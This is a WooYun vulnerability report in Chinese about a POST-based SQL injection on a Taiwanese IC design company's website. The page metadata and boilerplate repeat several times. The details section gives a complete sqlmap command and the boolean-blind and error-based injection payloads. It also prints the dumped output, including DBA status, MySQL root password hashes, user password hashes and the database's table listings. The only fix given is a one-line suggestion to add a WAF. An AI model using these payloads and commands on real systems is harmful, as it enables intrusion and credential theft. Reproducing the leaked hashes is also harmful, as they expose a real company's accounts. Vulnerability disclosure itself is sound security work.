應廣科技股份有限公司主站存在POST型SQL植入漏洞（DBA權限+root密碼+用戶密碼泄露）（臺灣地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156879

漏洞标题：應廣科技股份有限公司主站存在POST型SQL植入漏洞（DBA權限+root密碼+用戶密碼泄露）（臺灣地區）

漏洞作者：路人甲

提交时间：2015-12-01 11:35

修复时间：2016-01-16 16:34

公开时间：2016-01-16 16:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-01：细节已通知厂商并且等待厂商处理中
2015-12-02：厂商已经确认，细节仅向厂商公开
2015-12-12：细节向核心白帽子及相关领域专家公开
2015-12-22：细节向普通白帽子公开
2016-01-01：细节向实习白帽子公开
2016-01-16：细节向公众公开

简要描述：

公司背景
應廣科技成立於2005年，是一家專業的IC設計公司。應廣科技重視產品創新研發，專注於CPU與DSP平行處理架構，已開發出多核心平行處理系列IC FPPA™（Field Programmable Processor Array）。
市場理念
隨著全球IC市場競爭價值條件的改變，除IC設計外，還需提供軟體支援、韌體開發、平台整合、技術服務等整體解決方案的服務鏈；應廣科技深知除了開發高品質的產品之外，還需同時具備應用技術、服務、及前瞻性，讓應廣科技的客戶獲得整體解決方案的技術服務鏈，進而獲得強而有力的市場競爭力。應廣科技提供客戶最佳應用且最具競爭力的FPPA™多核心平行處理系列IC以及完整的技術決方案。
產品特質與優勢
應廣科技是客戶的"profit-making partner"。隨著市場激烈的時間競爭，客戶對於特有的產品設計與技術服務之合作信賴日益提升，應廣科技的FPPA™多核心平行處理系列IC擁有平行處理的高效能與功能軟體話的最大彈性，讓客戶在市場激烈的時間競爭中能省下更多寶貴時間，Time to Market適時提供市場更有競爭力的產品。
產品與應用現況
應廣科技已開發出一系列FPPA™多核心平行處理系列IC，並逐步進入馬達控制產品、自動化產品、家電產品、機器人產品以及安全系统設備等應用領域。
研發設計
應廣科技應用本身研發的創新工藝，開發出一系列的FPPA™多核心平行處理系列產品。應廣科技自主的研發團隊，完全掌控整個技術發展，堅持建立自有研發創新的IP技術，以提供客戶最好的競爭力。應廣科技之FPPA™多核心平行處理技術以及馬達控制，已申請多國多項專利，提供給客戶智慧財產權最佳的保護。

详细说明：

地址：http://**.**.**.**/products.php

$ python sqlmap.py -u "http://**.**.**.**/products.php" -p keyword --technique=BE --form --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass

current user:    'padauk@localhost'
current user is DBA:    True
database management system users [7]:
[*] ''@'localhost'
[*] ''@'www'
[*] 'padauk'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'www'
database management system users password hashes:
[*] padauk [1]:
    password hash: NULL
[*] root [3]:
    password hash: *140611DC50A38759A08037DAE654686EB91AF033
    password hash: *77901D2B02EF5EF2119DFBF1D640B5D8D3D20D80
    password hash: NULL

Database: padauk
Table: users
[4 entries]
+---------------+
| user_password |
+---------------+
| zz.ZezHCafeGI |
| zzaBl/9zflINI |
| zznXnajp6vfMs |
| zzrg3vo5rgBuw |
+---------------+

漏洞证明：

---
Parameter: keyword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: keyword=-6084') OR 6124=6124#&Submit.x=1&Submit.y=1
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: keyword=-5397') OR 1 GROUP BY CONCAT(0x7170627171,(SELECT (CASE WHEN (2139=2139) THEN 1 ELSE 0 END)),0x717a707871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Submit.x=1&Submit.y=1
---
web server operating system: FreeBSD
web application technology: PHP 5.4.37, Apache 2.4.12
back-end DBMS: MySQL >= 5.0.0
current user:    'padauk@localhost'
current user is DBA:    True
database management system users [7]:
[*] ''@'localhost'
[*] ''@'www'
[*] 'padauk'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'www'
database management system users password hashes:
[*] padauk [1]:
    password hash: NULL
[*] root [3]:
    password hash: *140611DC50A38759A08037DAE654686EB91AF033
    password hash: *77901D2B02EF5EF2119DFBF1D640B5D8D3D20D80
    password hash: NULL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keyword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: keyword=-6084') OR 6124=6124#&Submit.x=1&Submit.y=1
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: keyword=-5397') OR 1 GROUP BY CONCAT(0x7170627171,(SELECT (CASE WHEN (2139=2139) THEN 1 ELSE 0 END)),0x717a707871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Submit.x=1&Submit.y=1
---
web server operating system: FreeBSD
web application technology: PHP 5.4.37, Apache 2.4.12
back-end DBMS: MySQL 5
Database: information_schema
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| INNODB_BUFFER_PAGE                                 | 8192    |
| COLUMNS                                            | 2104    |
| SESSION_VARIABLES                                  | 447     |
| GLOBAL_VARIABLES                                   | 433     |
| GLOBAL_STATUS                                      | 341     |
| SESSION_STATUS                                     | 341     |
| COLLATION_CHARACTER_SET_APPLICABILITY              | 219     |
| COLLATIONS                                         | 219     |
| INNODB_METRICS                                     | 214     |
| PARTITIONS                                         | 181     |
| TABLES                                             | 181     |
| INNODB_BUFFER_PAGE_LRU                             | 166     |
| USER_PRIVILEGES                                    | 142     |
| STATISTICS                                         | 109     |
| KEY_COLUMN_USAGE                                   | 104     |
| TABLE_CONSTRAINTS                                  | 73      |
| INNODB_SYS_COLUMNS                                 | 70      |
| SCHEMA_PRIVILEGES                                  | 50      |
| PLUGINS                                            | 42      |
| CHARACTER_SETS                                     | 40      |
| INNODB_FT_DEFAULT_STOPWORD                         | 36      |
| INNODB_SYS_FIELDS                                  | 17      |
| INNODB_SYS_INDEXES                                 | 11      |
| ENGINES                                            | 9       |
| INNODB_SYS_TABLES                                  | 9       |
| INNODB_SYS_TABLESTATS                              | 9       |
| INNODB_CMP                                         | 5       |
| INNODB_CMP_RESET                                   | 5       |
| INNODB_CMPMEM                                      | 5       |
| INNODB_CMPMEM_RESET                                | 5       |
| INNODB_SYS_DATAFILES                               | 5       |
| INNODB_SYS_TABLESPACES                             | 5       |
| SCHEMATA                                           | 5       |
| INNODB_BUFFER_POOL_STATS                           | 1       |
| PROCESSLIST                                        | 1       |
+----------------------------------------------------+---------+
Database: padauk
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| products_kr                                        | 640620  |
| users_log                                          | 1307    |
| news_cn                                            | 124     |
| news_en                                            | 124     |
| news_jp                                            | 124     |
| news_kr                                            | 124     |
| news_tw                                            | 124     |
| products_in_cats                                   | 87      |
| products_cn                                        | 86      |
| products_en                                        | 86      |
| products_jp                                        | 86      |
| products_tw                                        | 74      |
| config                                             | 39      |
| products_cat_cn                                    | 19      |
| products_cat_en                                    | 19      |
| products_cat_jp                                    | 19      |
| products_cat_kr                                    | 19      |
| products_cat_tw                                    | 19      |
| application_notes_cn                               | 16      |
| application_notes_en                               | 16      |
| application_notes_jp                               | 16      |
| application_notes_kr                               | 16      |
| application_notes_tw                               | 16      |
| item                                               | 16      |
| category                                           | 11      |
| developing_tools_cn                                | 8       |
| developing_tools_en                                | 8       |
| developing_tools_jp                                | 8       |
| developing_tools_kr                                | 8       |
| developing_tools_tw                                | 8       |
| application_notes_cat_cn                           | 4       |
| application_notes_cat_en                           | 4       |
| application_notes_cat_jp                           | 4       |
| application_notes_cat_kr                           | 4       |
| application_notes_cat_tw                           | 4       |
| users                                              | 4       |
| developing_tools_cat_cn                            | 3       |
| developing_tools_cat_en                            | 3       |
| developing_tools_cat_jp                            | 3       |
| developing_tools_cat_kr                            | 3       |
| developing_tools_cat_tw                            | 3       |
+----------------------------------------------------+---------+
Database: performance_schema
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| events_waits_summary_by_thread_by_event_name       | 5263    |
| events_statements_summary_by_thread_by_event_name  | 3135    |
| events_statements_summary_by_digest                | 2779    |
| events_stages_summary_by_thread_by_event_name      | 2052    |
| events_waits_summary_by_account_by_event_name      | 831     |
| events_waits_summary_by_user_by_event_name         | 831     |
| events_waits_summary_by_host_by_event_name         | 554     |
| setup_instruments                                  | 553     |
| events_statements_summary_by_account_by_event_name | 495     |
| events_statements_summary_by_user_by_event_name    | 495     |
| events_statements_summary_by_host_by_event_name    | 330     |
| events_stages_summary_by_account_by_event_name     | 324     |
| events_stages_summary_by_user_by_event_name        | 324     |
| host_cache                                         | 279     |
| events_waits_summary_global_by_event_name          | 277     |
| events_waits_summary_by_instance                   | 255     |
| file_instances                                     | 255     |
| file_summary_by_instance                           | 255     |
| events_stages_summary_by_host_by_event_name        | 216     |
| table_io_waits_summary_by_index_usage              | 200     |
| events_statements_summary_global_by_event_name     | 165     |
| objects_summary_global_by_type                     | 122     |
| table_io_waits_summary_by_table                    | 122     |
| table_lock_waits_summary_by_table                  | 122     |
| events_stages_summary_global_by_event_name         | 108     |
| file_summary_by_event_name                         | 45      |
| threads                                            | 19      |
| setup_consumers                                    | 12      |
| performance_timers                                 | 5       |
| setup_objects                                      | 4       |
| setup_timers                                       | 4       |
| accounts                                           | 3       |
| socket_summary_by_event_name                       | 3       |
| users                                              | 3       |
| hosts                                              | 2       |
| events_statements_current                          | 1       |
| setup_actors                                       | 1       |
+----------------------------------------------------+---------+
Database: mysql
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| help_relation                                      | 1107    |
| help_topic                                         | 553     |
| help_keyword                                       | 499     |
| help_category                                      | 40      |
| `user`                                             | 7       |
| db                                                 | 3       |
| proxies_priv                                       | 2       |
+----------------------------------------------------+---------+

Database: padauk
Table: users
[4 entries]
+---------------+
| user_password |
+---------------+
| zz.ZezHCafeGI |
| zzaBl/9zflINI |
| zznXnajp6vfMs |
| zzrg3vo5rgBuw |
+---------------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2015-12-02 16:32

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156879

漏洞标题：應廣科技股份有限公司主站存在POST型SQL植入漏洞（DBA權限+root密碼+用戶密碼泄露）（臺灣地區）

相关厂商：應廣科技股份有限公司

漏洞作者：路人甲

提交时间：2015-12-01 11:35

修复时间：2016-01-16 16:34

公开时间：2016-01-16 16:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156879

漏洞标题：應廣科技股份有限公司主站存在POST型SQL植入漏洞（DBA權限+root密碼+用戶密碼泄露）（臺灣地區）

相关厂商：應廣科技股份有限公司

漏洞作者： 路人甲

提交时间：2015-12-01 11:35

修复时间：2016-01-16 16:34

公开时间：2016-01-16 16:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0156879"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云